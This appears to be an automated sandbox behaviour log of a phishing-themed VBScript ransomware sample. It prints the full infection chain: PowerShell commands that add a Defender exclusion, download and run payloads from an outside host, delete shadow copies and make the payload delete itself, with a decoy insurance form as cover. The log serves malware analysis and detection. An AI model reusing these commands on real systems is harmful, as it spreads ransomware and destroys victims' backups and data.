Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\eryy65ty.exe D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fjeljies.cpl 4B4A87552C44158FB53A72C7294319B0DDDE9F99F460425AD5997D3B9121CD1E
Source: NOTIFICATION_OF_DEPENDANTS.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@100/739@5/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emuktcsl.4xq.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: NOTIFICATION_OF_DEPENDANTS.vbsVirustotal: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1751520470238867524,1103501231099164718,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2012,i,1751520470238867524,1103501231099164718,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
